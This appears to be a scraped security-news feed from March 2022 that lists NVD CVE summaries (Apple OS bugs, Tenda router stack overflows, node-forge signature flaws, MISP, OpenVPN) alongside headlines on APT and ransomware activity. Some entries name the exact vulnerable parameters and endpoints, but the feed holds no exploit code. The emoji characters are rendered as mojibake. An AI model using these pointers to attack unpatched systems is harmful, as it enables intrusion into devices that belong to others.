Automotive Grade Linux Kooky Koi 11.0.0, 11.0.1, 11.0.2, 11.0.3, 11.0.4, and 11.0.5 is affected by Incorrect Access Control in usr/bin/afb-daemon. To exploit the vulnerability, an attacker should send a well-crafted HTTP (or WebSocket) request to the socket listened by the afb-daemon process. No credentials nor user interactions are required.

πŸ“– Read

via "National Vulnerability Database".
11:22
β€Ό CVE-2022-0742 β€Ό

Memory leak in icmp6 implementation in Linux Kernel 5.13+ allows a remote attacker to DoS a host by making it go out-of-memory via icmp6 packets of type 130 or 131. We recommend upgrading past commit 2d3916f3189172d5c69d33065c3c21119fe539fc.

πŸ“– Read

via "National Vulnerability Database".
?
11:58
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
❌ Google Blows Lid Off Conti, Diavol Ransomware Access-Broker Ops ❌

Researchers have exposed the work of Exotic Lily, a full-time cybercriminal initial-access group that uses phishing to infiltrate organizations’ networks for further malicious activity.

πŸ“– Read

via "Threat Post".
12:09
πŸ—“οΈ Workaround offered for unpatched HTML-to-PDF rendering vulnerability πŸ—“οΈ

Security flaws exposed in popular dompdf PHP library

πŸ“– Read

via "The Daily Swig".
?
13:22
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
β€Ό CVE-2022-24772 β€Ό

Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not check for tailing garbage bytes after decoding a `DigestInfo` ASN.1 structure. This can allow padding bytes to be removed and garbage data added to forge a signature when a low public exponent is being used. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds.

πŸ“– Read

via "National Vulnerability Database".
13:22
β€Ό CVE-2022-24771 β€Ό

Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code is lenient in checking the digest algorithm structure. This can allow a crafted structure that steals padding bytes and uses unchecked portion of the PKCS#1 encoded message to forge a signature when a low public exponent is being used. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds.

πŸ“– Read

via "National Vulnerability Database".
13:22
β€Ό CVE-2022-24773 β€Ό

Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not properly check `DigestInfo` for a proper ASN.1 structure. This can lead to successful verification with signatures that contain invalid structures but a valid digest. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds.

πŸ“– Read

via "National Vulnerability Database".
?
14:13
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
πŸ•΄ Satellite Networks Worldwide at Risk of Possible Cyberattacks, FBI & CISA Warn πŸ•΄

Agencies provide mitigation steps to protect satellite communication (SATCOM) networks amid "current geopolitical situation."

πŸ“– Read

via "Dark Reading".
14:28
❌ Sandworm APT Hunts for ASUS Routers with Cyclops Blink Botnet ❌

The Russian-speaking APT behind the NotPetya attacks and the Ukrainian power grid takedown could be setting up for additional sinister attacks, researchers said.

πŸ“– Read

via "Threat Post".
?
14:59
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
⚠ S3 Ep74: Cybercrime busts, Apple patches, Pi Day, and disconnect effects [Podcast] ⚠

Latest episode - listen now!

πŸ“– Read

via "Naked Security".
?
15:22
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
β€Ό CVE-2022-24637 β€Ό

Open Web Analytics (OWA) before 1.7.4 allows an unauthenticated remote attacker to obtain sensitive user information, which can be used to gain admin privileges by leveraging cache hashes. This occurs because files generated with '<?php (instead of the intended "<?php sequence) aren't handled by the PHP interpreter.

πŸ“– Read

via "National Vulnerability Database".
15:22
β€Ό CVE-2021-39046 β€Ό

IBM Business Automation Workflow 18.0, 19.0, 20.0, and 21.0 and IBM Business Process Manager 8.5 and 8.6 stores user credentials in plain clear text which can be read by a lprivileged user. IBM X-Force ID: 214346.

πŸ“– Read

via "National Vulnerability Database".
15:22
β€Ό CVE-2021-29899 β€Ό

IBM Engineering Requirements Quality Assistant prior to 3.1.3 could allow an authenticated user to cause a denial of service. IBM X-Force ID: 207413.

πŸ“– Read

via "National Vulnerability Database".
15:29
⚠ OpenSSL patches infinite-loop DoS bug in certificate verification ⚠

When it comes to writing loops in your code... never sit on the fence!

πŸ“– Read

via "Naked Security".
15:32
πŸ” Friday Five 3/18 πŸ”

How HIPAA can help mitigate cyberattacks, killing the password, and more - catch up on the infosec news of the week with the Friday Five!

πŸ“– Read

via "".
15:43
πŸ•΄ Security Teams Struggle to Get Started With Zero Trust πŸ•΄

Nearly a third of respondents in a Dark Reading survey on endpoint security strategy say zero trust is too confusing to implement.

πŸ“– Read

via "Dark Reading".
15:58
❌ DarkHotel APT Targets Wynn, Macao Hotels to Rip Off Guest Data ❌

A DarkHotel phishing campaign breached luxe hotel networks, including Wynn Palace and the Grand Coloane Resort in Macao, a new report says.

πŸ“– Read

via "Threat Post".
?
17:13
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
πŸ•΄ Menlo Security: Less Than Three in 10 Organizations Are Equipped to Combat Growing Wave of Web-Based Cyber Threats πŸ•΄

Report finds that 62 percent of IT decision makers have suffered a browser-based attack in the past 12 months.

πŸ“– Read

via "Dark Reading".
17:13
πŸ•΄ A Chance to Raise Shields Right πŸ•΄

CISA's "Shields Up" alert provides urgency β€” and opportunity β€” for supply chain conversations.

πŸ“– Read

via "Dark Reading".
17:13
πŸ•΄ CyCognito Launches Exploit Intelligence πŸ•΄

Risk intelligence solution provides insight, visibility, and guidance to identify, prioritize, and remediate vulnerabilities like Log4j

πŸ“– Read

via "Dark Reading".
17:22
β€Ό CVE-2022-22611 β€Ό

An out-of-bounds read was addressed with improved input validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, iTunes 12.12.3 for Windows, watchOS 8.5, macOS Monterey 12.3. Processing a maliciously crafted image may lead to arbitrary code execution.

πŸ“– Read

via "National Vulnerability Database".
17:22
β€Ό CVE-2022-22617 β€Ό

A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to gain elevated privileges.

πŸ“– Read

via "National Vulnerability Database".
17:22
β€Ό CVE-2022-22656 β€Ό

An authentication issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. A local attacker may be able to view the previous logged in userÒ€ℒs desktop from the fast user switching screen.

πŸ“– Read

via "National Vulnerability Database".
17:22
β€Ό CVE-2022-25605 β€Ό

Multiple Authenticated Stored Cross-Site Scripting (XSS) vulnerabilities discovered in WP-DownloadManager WordPress plugin (versions <= 1.68.6). Vvulnerable parameters &download_path, &download_path_url, &download_page_url.

πŸ“– Read

via "National Vulnerability Database".
17:22
β€Ό CVE-2022-22618 β€Ό

This issue was addressed with improved checks. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4. A user may be able to bypass the Emergency SOS passcode prompt.

πŸ“– Read

via "National Vulnerability Database".
17:22
β€Ό CVE-2022-22626 β€Ό

An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory.

πŸ“– Read

via "National Vulnerability Database".
17:22
β€Ό CVE-2021-30771 β€Ό

An out-of-bounds write was addressed with improved input validation. This issue is fixed in macOS Big Sur 11.4, iOS 14.6 and iPadOS 14.6, watchOS 7.5, tvOS 14.6. Processing a maliciously crafted font file may lead to arbitrary code execution.

πŸ“– Read

via "National Vulnerability Database".
17:22
β€Ό CVE-2022-27243 β€Ό

An issue was discovered in MISP before 2.4.156. app/View/Users/terms.ctp allows Local File Inclusion via the custom terms file setting.

πŸ“– Read

via "National Vulnerability Database".
17:22
β€Ό CVE-2022-25603 β€Ό

Authenticated (author or higher user role) Stored Cross-Site Scripting (XSS) vulnerability discovered in MaxGalleria WordPress plugin (versions 6.2.5).

πŸ“– Read

via "National Vulnerability Database".
17:22
β€Ό CVE-2022-22671 β€Ό

An authentication issue was addressed with improved state management. This issue is fixed in iOS 15.4 and iPadOS 15.4. A person with physical access to an iOS device may be able to access photos from the lock screen.

πŸ“– Read

via "National Vulnerability Database".
17:22
β€Ό CVE-2022-22586 β€Ό

An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges.

πŸ“– Read

via "National Vulnerability Database".
17:22
β€Ό CVE-2022-22666 β€Ό

A memory corruption issue was addressed with improved validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, watchOS 8.5. Processing a maliciously crafted image may lead to heap corruption.

πŸ“– Read

via "National Vulnerability Database".
17:23
β€Ό CVE-2022-22596 β€Ό

A memory corruption issue was addressed with improved validation. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4. An application may be able to execute arbitrary code with kernel privileges.

πŸ“– Read

via "National Vulnerability Database".
17:23
β€Ό CVE-2022-22603 β€Ό

An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.

πŸ“– Read

via "National Vulnerability Database".
17:23
β€Ό CVE-2022-1011 β€Ό

A flaw use after free in the Linux kernel FUSE filesystem was found in the way user triggers write(). A local user could use this flaw to get some unauthorized access to some data from the FUSE filesystem and as result potentially privilege escalation too.

πŸ“– Read

via "National Vulnerability Database".
17:23
β€Ό CVE-2022-22627 β€Ό

An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory.

πŸ“– Read

via "National Vulnerability Database".
17:23
β€Ό CVE-2022-0547 β€Ό

OpenVPN 2.1 until v2.4.12 and v2.5.6 may enable authentication bypass in external authentication plug-ins when more than one of them makes use of deferred authentication replies, which allows an external user to be granted access with only partially correct credentials.

πŸ“– Read

via "National Vulnerability Database".
17:23
β€Ό CVE-2022-22578 β€Ό

A logic issue was addressed with improved validation. This issue is fixed in tvOS 15.3, iOS 15.3 and iPadOS 15.3, watchOS 8.4, macOS Monterey 12.2. A malicious application may be able to gain root privileges.

πŸ“– Read

via "National Vulnerability Database".
17:23
β€Ό CVE-2022-22607 β€Ό

An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.

πŸ“– Read

via "National Vulnerability Database".
17:23
β€Ό CVE-2022-25607 β€Ό

Authenticated (author or higher user role) SQL Injection (SQLi) vulnerability discovered in FV Flowplayer Video Player WordPress plugin (versions <= 7.5.15.727).

πŸ“– Read

via "National Vulnerability Database".
17:28
β€Ό CVE-2022-22652 β€Ό

The GSMA authentication panel could be presented on the lock screen. The issue was resolved by requiring device unlock to interact with the GSMA authentication panel. This issue is fixed in iOS 15.4 and iPadOS 15.4. A person with physical access may be able to view and modify the carrier account information and settings from the lock screen.

πŸ“– Read

via "National Vulnerability Database".
17:28
β€Ό CVE-2022-22600 β€Ό

The issue was addressed with improved permissions logic. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. A malicious application may be able to bypass certain Privacy preferences.

πŸ“– Read

via "National Vulnerability Database".
17:28
β€Ό CVE-2022-22651 β€Ό

An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.3. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory.

πŸ“– Read

via "National Vulnerability Database".
17:28
β€Ό CVE-2022-27245 β€Ό

An issue was discovered in MISP before 2.4.156. app/Model/Server.php does not restrict generateServerSettings to the CLI. This could lead to SSRF.

πŸ“– Read

via "National Vulnerability Database".
17:28
β€Ό CVE-2022-27246 β€Ό

An issue was discovered in MISP before 2.4.156. An SVG org logo (which may contain JavaScript) is not forbidden by default.

πŸ“– Read

via "National Vulnerability Database".
17:28
β€Ό CVE-2021-27789 β€Ό

The Web application of Brocade Fabric OS before versions Brocade Fabric OS v9.0.1a and v8.2.3a contains debug statements that expose sensitive information to the program's standard output device. An attacker who has compromised the FOS system may utilize this weakness to capture sensitive information, such as user credentials.

πŸ“– Read

via "National Vulnerability Database".
17:28
β€Ό CVE-2022-22592 β€Ό

A logic issue was addressed with improved state management. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing maliciously crafted web content may prevent Content Security Policy from being enforced.

πŸ“– Read

via "National Vulnerability Database".
17:28
β€Ό CVE-2022-27244 β€Ό

An issue was discovered in MISP before 2.4.156. A malicious site administrator could store an XSS payload in the custom auth name. This would be executed each time the administrator modifies a user.

πŸ“– Read

via "National Vulnerability Database".
17:28
β€Ό CVE-2022-24091 β€Ό

Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious font file.

πŸ“– Read

via "National Vulnerability Database".
17:28
β€Ό CVE-2021-4031 β€Ό

Syltek application before its 10.22.00 version, does not correctly check that a product ID has a valid payment associated to it. This could allow an attacker to forge a request and bypass the payment system by marking items as payed without any verification.

πŸ“– Read

via "National Vulnerability Database".
17:28
β€Ό CVE-2022-22633 β€Ό

A memory corruption issue was addressed with improved state management. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, macOS Monterey 12.3. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution.

πŸ“– Read

via "National Vulnerability Database".
17:28
β€Ό CVE-2022-22634 β€Ό

A buffer overflow was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4. A malicious application may be able to execute arbitrary code with kernel privileges.

πŸ“– Read

via "National Vulnerability Database".
17:28
β€Ό CVE-2022-22591 β€Ό

A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges.

πŸ“– Read

via "National Vulnerability Database".
17:29
β€Ό CVE-2020-25193 β€Ό

By having access to the hard-coded cryptographic key for GE Reason RT430, RT431 & RT434 GNSS clocks in firmware versions prior to version 08A06, attackers would be able to intercept and decrypt encrypted traffic through an HTTPS connection.

πŸ“– Read

via "National Vulnerability Database".
17:29
β€Ό CVE-2022-22620 β€Ό

A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited..

πŸ“– Read

via "National Vulnerability Database".
17:29
β€Ό CVE-2022-22584 β€Ό

A memory corruption issue was addressed with improved validation. This issue is fixed in tvOS 15.3, iOS 15.3 and iPadOS 15.3, watchOS 8.4, macOS Monterey 12.2. Processing a maliciously crafted file may lead to arbitrary code execution.

πŸ“– Read

via "National Vulnerability Database".
17:29
β€Ό CVE-2022-22604 β€Ό

An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Xcode 13.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution.

πŸ“– Read

via "National Vulnerability Database".
17:29
β€Ό CVE-2022-22644 β€Ό

A privacy issue existed in the handling of Contact cards. This was addressed with improved state management. This issue is fixed in macOS Monterey 12.3. A malicious application may be able to access information about a user's contacts.

πŸ“– Read

via "National Vulnerability Database".
17:29
β€Ό CVE-2022-22621 β€Ό

This issue was addressed with improved checks. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions.

πŸ“– Read

via "National Vulnerability Database".
17:29
❌ Agencies Warn on Satellite Hacks & GPS Jamming Affecting Airplanes, Critical Infrastructure ❌

The Russian invasion of Ukraine has coincided with the jamming of airplane navigation systems and hacks on the SATCOM networks that empower critical infrastructure.

πŸ“– Read

via "Threat Post".
17:33
β€Ό CVE-2022-22665 β€Ό

A logic issue was addressed with improved validation. This issue is fixed in macOS Monterey 12.3. A malicious application may be able to gain root privileges.

πŸ“– Read

via "National Vulnerability Database".
17:33
β€Ό CVE-2020-25182 β€Ό

Rockwell Automation ISaGRAF Runtime Versions 4.x and 5.x searches for and loads DLLs as dynamic libraries. Uncontrolled loading of dynamic libraries could allow a local, unauthenticated attacker to execute arbitrary code. This vulnerability only affects ISaGRAF Runtime when running on Microsoft Windows systems.

πŸ“– Read

via "National Vulnerability Database".
17:36
β€Ό CVE-2022-22640 β€Ό

A memory corruption issue was addressed with improved validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. An application may be able to execute arbitrary code with kernel privileges.

πŸ“– Read

via "National Vulnerability Database".
?
18:44
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
πŸ•΄ Code-Sabotage Incident in Protest of Ukraine War Exposed Open Source Risks πŸ•΄

The maintainer of a widely used npm module served up an unwelcome surprise for developers.

πŸ“– Read

via "Dark Reading".
?
19:14
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
πŸ•΄ Half of Orgs Use Web Application Firewalls to Paper Over Flaws πŸ•΄

WAFs remain a popular backfill for complex and fraught patch management.

πŸ“– Read

via "Dark Reading".
19:22
β€Ό CVE-2022-25453 β€Ό

Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the time parameter in the saveParentControlInfo function.

πŸ“– Read

via "National Vulnerability Database".
19:22
β€Ό CVE-2022-25458 β€Ό

Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the cmdinput parameter in the exeCommand function.

πŸ“– Read

via "National Vulnerability Database".
19:22
β€Ό CVE-2022-25461 β€Ό

Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the startip parameter in the SetPptpServerCfg function.

πŸ“– Read

via "National Vulnerability Database".
19:22
β€Ό CVE-2022-25441 β€Ό

Tenda AC9 v15.03.2.21 was discovered to contain a remote command execution (RCE) vulnerability via the vlanid parameter in the SetIPTVCfg function.

πŸ“– Read

via "National Vulnerability Database".
19:22
β€Ό CVE-2022-25452 β€Ό

Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the URLs parameter in the saveParentControlInfo function.

πŸ“– Read

via "National Vulnerability Database".
19:22
β€Ό CVE-2022-25456 β€Ό

Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the security_5g parameter in the WifiBasicSet function.

πŸ“– Read

via "National Vulnerability Database".
19:22
β€Ό CVE-2022-25455 β€Ό

Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the list parameter in the SetIpMacBind function.

πŸ“– Read

via "National Vulnerability Database".
19:22
β€Ό CVE-2022-25454 β€Ό

Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the loginpwd parameter in the SetFirewallCfg function.

πŸ“– Read

via "National Vulnerability Database".
19:23
β€Ό CVE-2022-25439 β€Ό

Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the list parameter in the SetIpMacBind function.

πŸ“– Read

via "National Vulnerability Database".
19:23
β€Ό CVE-2022-25457 β€Ό

Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the ntpserver parameter in the SetSysTimeCfg function.

πŸ“– Read

via "National Vulnerability Database".
19:23
β€Ό CVE-2022-25449 β€Ό

Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the deviceId parameter in the saveParentControlInfo function.

πŸ“– Read

via "National Vulnerability Database".
19:23
β€Ό CVE-2022-25427 β€Ό

Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the schedendtime parameter in the openSchedWifi function.

πŸ“– Read

via "National Vulnerability Database".
19:23
β€Ό CVE-2022-25429 β€Ό

Tenda AC9 v15.03.2.21 was discovered to contain a buffer overflow via the time parameter in the saveparentcontrolinfo function.

πŸ“– Read

via "National Vulnerability Database".
19:23
β€Ό CVE-2022-25440 β€Ό

Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the ntpserver parameter in the SetSysTimeCfg function.

πŸ“– Read

via "National Vulnerability Database".
19:23
β€Ό CVE-2022-25451 β€Ό

Tenda AC6 V15.03.05.09_multi was discovered to contain a stack overflow via the list parameter in the setstaticroutecfg function.

πŸ“– Read

via "National Vulnerability Database".
19:23
β€Ό CVE-2022-25459 β€Ό

Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the S1 parameter in the SetSysTimeCfg function.

πŸ“– Read

via "National Vulnerability Database".
19:23
β€Ό CVE-2022-25445 β€Ό

Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the time parameter in the PowerSaveSet function.

πŸ“– Read

via "National Vulnerability Database".
19:23
β€Ό CVE-2022-25428 β€Ό

Tenda AC9 v15.03.2.21 was discovered to contain a stack overflow via the deviceId parameter in the saveparentcontrolinfo function.

πŸ“– Read

via "National Vulnerability Database".
19:23
β€Ό CVE-2022-25447 β€Ό

Tenda AC6 v15.03.05.09_multi was discovered to contain a stack overflow via the schedendtime parameter in the openSchedWifi function.

πŸ“– Read

via "National Vulnerability Database".
19:23
β€Ό CVE-2022-25431 β€Ό

Tenda AC9 v15.03.2.21 was discovered to contain multiple stack overflows via the NPTR, V12, V10 and V11 parameter in the Formsetqosband function.

πŸ“– Read

via "National Vulnerability Database".
?
21:23
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
β€Ό CVE-2022-26265 β€Ό

Contao Managed Edition v1.5.0 was discovered to contain a remote command execution (RCE) vulnerability via the component php_cli parameter.

πŸ“– Read

via "National Vulnerability Database".
21:23
β€Ό CVE-2022-25581 β€Ό

Classcms v2.5 and below contains an arbitrary file upload via the component \class\classupload. This vulnerability allows attackers to execute code injection via a crafted .txt file.

πŸ“– Read

via "National Vulnerability Database".
21:23
β€Ό CVE-2022-26267 β€Ό

Piwigo v12.2.0 was discovered to contain an information leak via the action parameter in /admin/maintenance_actions.php.

πŸ“– Read

via "National Vulnerability Database".
21:23
β€Ό CVE-2022-25390 β€Ό

DCN Firewall DCME-520 was discovered to contain a remote command execution (RCE) vulnerability via the host parameter in the file /system/tool/ping.php.

πŸ“– Read

via "National Vulnerability Database".
21:23
β€Ό CVE-2022-25578 β€Ό

taocms v3.0.2 allows attackers to execute code injection via arbitrarily editing the .htaccess file.

πŸ“– Read

via "National Vulnerability Database".
21:23
β€Ό CVE-2022-25389 β€Ό

DCN Firewall DCME-520 was discovered to contain an arbitrary file download vulnerability via the path parameter in the file /audit/log/log_management.php.

πŸ“– Read

via "National Vulnerability Database".
21:23
β€Ό CVE-2022-26266 β€Ό

Piwigo v12.2.0 was discovered to contain a SQL injection vulnerability via pwg.users.php.

πŸ“– Read

via "National Vulnerability Database".
19 March 2022
?
02:23
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
β€Ό CVE-2022-27226 β€Ό

A CSRF issue in /api/crontab on iRZ Mobile Routers through 2022-03-16 allows a threat actor to create a crontab entry in the router administration panel. The cronjob will consequently execute the entry on the threat actor's defined interval, leading to remote code execution, allowing the threat actor to gain filesystem access. In addition, if the router's default credentials aren't rotated or a threat actor discovers valid credentials, remote code execution can be achieved without user interaction.

πŸ“– Read

via "National Vulnerability Database".
?
07:23
πŸ›‘ Cybersecurity & Privacy news πŸ›‘
β€Ό CVE-2022-0991 β€Ό

Insufficient Session Expiration in GitHub repository admidio/admidio prior to 4.1.9.

πŸ“– Read

via "National Vulnerability Database".